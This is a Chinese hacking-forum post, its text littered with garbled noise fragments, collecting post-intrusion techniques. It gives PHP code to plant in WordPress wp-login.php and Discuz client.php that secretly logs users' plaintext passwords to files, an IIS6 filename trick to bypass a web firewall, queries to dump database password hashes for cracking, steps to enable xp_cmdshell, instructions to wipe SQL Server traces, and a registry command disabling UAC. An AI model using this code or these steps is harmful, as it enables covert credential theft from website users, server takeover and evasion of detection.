) q' Z: \' ~: q! t+ U% ^0 Z, J5 O5 Pwebshell下记录Wordpress登陆密码方便进一步社工+ {3 h- M) S) `' S( C& n
在文件wp-login.php中539行处添加:, m+ ?$ W# o: E* f% n' ^1 g
// log password) v2 b& X% l; z; G1 O+ c) f1 I0 H8 Q
$log_user=$_POST['log'];0 p/ d' l2 _  X2 E
$log_pwd=$_POST['pwd'];
7 h# B0 {2 \% M' s' L$log_ip=$_SERVER["REMOTE_ADDR"];) s3 U- X$ ~! g) a
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;- N/ a/ @2 U; |9 m7 p$ F6 n7 }$ `
$txt=$txt.”\r\n”;0 J9 a7 O8 ]- w7 `" `7 J1 m
if($log_user&&$log_pwd&&$log_ip){
: R# W8 l# R' m- M+ D@fwrite(fopen(‘pwd.txt’,”a+”),$txt);  l0 |; @  u& S! @7 X6 f
}+ a. f! U% M& P- ^/ p
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。, h8 i' Z* k& c- M* V
就是搜索case ‘login’  k4 y( K0 J+ A/ `6 f1 {
在它下面直接插入即可,记录的密码生成在pwd.txt中,
! a( Z2 \+ V- l- B1 r! {其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录2 C! a. D  p7 f# `
利用II6文件解析漏洞绕过安全狗代码:
6 p+ I: n) S; r4 ]7 l;antian365.asp;antian365.jpg4 `& \! V. L, ]$ @
' H% p( {0 Z' L2 _! I, C
各种类型数据库抓HASH破解最高权限密码!* Z$ i9 x+ A- b3 V+ B/ h& ]
1.sql server2000
( \- L  K  R# I9 Q# D2 @SELECT password from master.dbo.sysxlogins where name='sa'7 g, r3 g' o. J
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341* b  f6 @/ Z  y# j* I! C0 o0 l
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A/ }5 H) U" k  A+ j: z) z

6 l) r0 q8 ^; h$ S5 O' c0×0100- constant header
2 l# j/ Y% a2 I; m0 Y/ [! L0 n; p- k34767D5C- salt; l* }. R/ j5 B( A' @1 e- W
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
+ r. z. Z- W7 x/ I& U& p) X2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
& x+ m& r0 M& o9 _  ncrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
6 }* Y, T! ~; D0 Z- q+ _! BSQL server 2005:-# Y& g6 F. n% o" u% {
SELECT password_hash FROM sys.sql_logins where name='sa': q7 w' w; k; m) Z; A( a
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F4 l4 r/ ^: {; C
0×0100- constant header/ h) n$ j5 u1 o) t3 Q: x
993BF231-salt. v/ m8 X- x& g  K( P' V
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
. l! b# y& [6 P6 _  A. l9 {. ~crack case sensitive hash in cain, try brute force and dictionary based attacks.3 q  K2 [0 d% c
3 ?" F( ?+ d0 _' F/ V
update:- following bernardo’s comments:-6 q! `7 h! @- e* d, I
use function fn_varbintohexstr() to cast password in a hex string.
7 A8 B# V1 U/ H5 Y1 e8 Qe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins1 N0 A- d% d! D: b9 s
5 f" f9 ~. @6 ~  W, |- f; p, N; ~
MYSQL:-
1 I" N: H7 Q9 `& v. H5 S0 y2 Y% d
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
0 R* \, E  V/ B3 x. y' ~, W& B- r* {0 d* o$ m9 C" q, `
*mysql  < 4.1
7 N" y" w/ D  \  h+ v7 y& U) z# E! Y5 f
mysql> SELECT PASSWORD(‘mypass’);
/ U3 Y. ?/ |5 s% S4 k, C" Y( @8 B+——————–+
# O9 m# f2 N; g" |) Z: v5 S5 N| PASSWORD(‘mypass’) |
. m  r; m2 Z  A) P4 K+——————–+
6 h- W+ k" E  f( C( a) [) o, I| 6f8c114b58f2ce9e   |
) m- I0 `/ k0 C' w8 l. q- ]3 s1 C+——————–++ J& F2 o, N1 k* b# B) E/ ~

" B* u- `* {, W8 y1 U; w/ d. @*mysql >=4.1: z6 ~$ I  `3 Y, I6 m: L. H8 {
' u) M$ a8 o) f* N* }4 |6 y! C- P
mysql> SELECT PASSWORD(‘mypass’);2 W2 G4 `! B3 V4 |" ?
+——————————————-+
# @) q1 B* a8 u: @7 f1 Q* M( d5 A| PASSWORD(‘mypass’)                        |
+ \4 U" M* l  ?# E+——————————————-+
0 V% |1 _: ^. K4 i0 w- Y) o| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |+ E2 ^+ @5 V. v; j( G+ u
+——————————————-+
0 Q1 Y. z& {7 e& }+ ?! B, S
, i( z# z8 Z- rSelect user, password from mysql.user
6 g. V& |7 F- a  \4 v0 ?  d" UThe hashes can be cracked in ‘cain and abel’
( R- Q" ~% p& P. U6 x% P# [5 g' Z# O' I) m9 I' f
Postgres:-/ [. A7 U5 {+ @* _
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
8 j5 t/ e) ?' ?7 wselect usename, passwd from pg_shadow;) X( r9 Z" P% k2 j! g
usename      |  passwd
3 [: f7 t% [1 h  j) A4 \1 s5 @——————+————————————-
8 F/ |" U+ T- J$ Etestuser            | md5fabb6d7172aadfda4753bf0507ed4396. Q# q( u5 o0 |# E1 Y7 h
use mdcrack to crack these hashes:-
, K" W( G& R2 D3 p. P/ a! X; q4 m+ L$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
* Q. R$ E: J+ {% c
: Z# S- K. h  V) |) h; C7 G5 aOracle:-
' I5 S  }+ Y9 `& ~select name, password, spare4 from sys.user$
. p1 I1 a8 v6 ?- u3 }; Dhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
: @1 X  K: ?8 p  n8 e5 a% rMore on Oracle later, i am a bit bored….
5 B: B1 @9 i6 @6 I/ m' f
& \9 S. j* R2 m2 |
$ E3 g* p4 a. y; s6 d9 c% p在sql server2005/2008中开启xp_cmdshell
4 g& ?1 }/ m6 i  H  C" G-- To allow advanced options to be changed.2 o! n5 c- j9 c1 t( |, @6 a- N8 m
EXEC sp_configure 'show advanced options', 18 P$ m5 p% M9 T& d& _( D  z
GO
, H0 Q" {% N+ x-- To update the currently configured value for advanced options.
; }9 T0 I( ?  [" mRECONFIGURE
- M# b  x: P! j5 l9 cGO( O0 V) a6 f. T+ i( y
-- To enable the feature.9 l# P4 |, T- r: [
EXEC sp_configure 'xp_cmdshell', 1, q5 E$ J/ A6 u! n) `
GO0 ?7 }) Q5 O$ g
-- To update the currently configured value for this feature.# P) ]& i/ M: v* z
RECONFIGURE
% W( `  y6 R6 C' D( j* U# dGO
- e$ L6 M% \6 rSQL 2008 server日志清除,在清楚前一定要备份。
: \# D5 s" [( Z2 z如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:$ Y6 k! Y/ t' C
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
4 `: R# P% B9 n; o' g6 l; }, K2 t& D3 B& p: A
对于SQL Server 2008以前的版本:$ w7 A4 ?) o( t. `- O' k
SQL Server 2005:
/ z$ f! g; c) v- L删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
3 X# h" U# u! T1 m% d5 A; KSQL Server 2000:# B9 K' w+ n% n# Z+ {% C; E
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。: t: q4 O9 j) T/ {( e: B$ e

! a3 z4 |' k0 r+ H+ U6 ]3 g本帖最后由 simeon 于 2013-1-3 09:51 编辑
5 @5 g+ K' Q, `) c/ m/ q  w/ o# a( V0 _9 Z; M

9 M2 O7 F! K0 i3 l! r* zwindows 2008 文件权限修改8 Y7 u" N; r$ l  T! e( b
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx; o$ a$ Q) p9 N% k6 r
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
! q) ], m' s( D$ M一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
5 @5 }! [! @, B7 C! Y$ C, ~' ]( C3 f: \
5 Y, X. G6 U. h' V- x$ HWindows Registry Editor Version 5.00
' @( ?4 V5 h7 t% {& |' @[HKEY_CLASSES_ROOT\*\shell\runas]8 k/ a6 D2 V. c7 s
@="管理员取得所有权": Q3 e" o  Q' k
"NoWorkingDirectory"=""/ h' D' h# H1 R: _: \* g
[HKEY_CLASSES_ROOT\*\shell\runas\command]% |2 r; g' C6 g
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 S7 @$ c! I3 ~0 c"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 O6 e! `- v3 [# @
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
, G, F7 `9 E8 B' v@="管理员取得所有权"
+ W; j$ E0 V% _. K"NoWorkingDirectory"=""
1 H; _2 n. h6 ?* `[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
5 C& k- i8 q1 e2 @@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& l5 ]+ z8 n4 B8 _. q2 @+ i9 F/ G"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- g* s, H( N. p' P5 e9 v

. m7 ]* A9 ~, _[HKEY_CLASSES_ROOT\Directory\shell\runas]- p/ m$ |/ m2 _( Y" L! e
@="管理员取得所有权"! O  B& Y7 d; ~0 s) a5 z
"NoWorkingDirectory"=""1 p' G5 I: v5 y  e& q3 X
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
0 I" q0 q0 L: e+ T) C# D@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"6 Y- M  a1 K7 p- Y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- t- \& X6 T: s
  X2 I. @: V7 P' E% M4 J# k. p; j4 j( _2 h- P
win7右键“管理员取得所有权”.reg导入% q8 x; u6 w& l% o- N
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
7 y. y7 t9 |# `+ G1、C:\Windows这个路径的“notepad.exe”不需要替换8 u6 a7 d' A& L8 l) t
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
, |' H) \7 ^+ I! c: \! y3、四个“notepad.exe.mui”不要管
- t, h$ W% Z1 t, E4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和1 b9 z' N, E5 L
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”5 l0 o4 h! i. j0 U. u# f( O
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,: k9 R: i+ x: U& G" W
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。) N, z9 T9 F. L3 z5 |7 e) O
windows 2008中关闭安全策略: " s7 F7 x8 D2 H% |# Z* K/ ]
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
: v) c# M. h1 W4 @5 x: L7 y修改uc_client目录下的client.php 在
# J7 H. l) G/ \4 j5 `, Tfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {* w& x$ V! e9 ]
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php4 i' |* |! a" P3 r+ A
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw, |, d( W' l3 n( Z
if(getenv('HTTP_CLIENT_IP')) {
6 J3 }/ @: o$ M$onlineip = getenv('HTTP_CLIENT_IP');; B/ L3 z; ], R9 j0 x
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
4 p; ~% k$ U* i( ?3 d$ ]. I' l$onlineip = getenv('HTTP_X_FORWARDED_FOR');
$ g( X9 |. s$ y: \4 B} elseif(getenv('REMOTE_ADDR')) {. g- N" v6 ^* Y3 t4 ]$ r
$onlineip = getenv('REMOTE_ADDR');
, d/ B% f  k: ?6 L+ j6 S} else {
$ m' F% o# ?' ]+ n$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
; f) X3 I/ B& k; n$ Z, g9 j}
: _" u2 G# B  n: T  m. W     $showtime=date("Y-m-d H:i:s");) z) P) Q, b* |) i6 B$ H
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
4 o! A+ j% k- Q- L3 B! f0 [+ ]    $handle=fopen('./data/cache/csslog.php','a+');+ {% I; R0 C  b; S1 N2 c+ Z
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表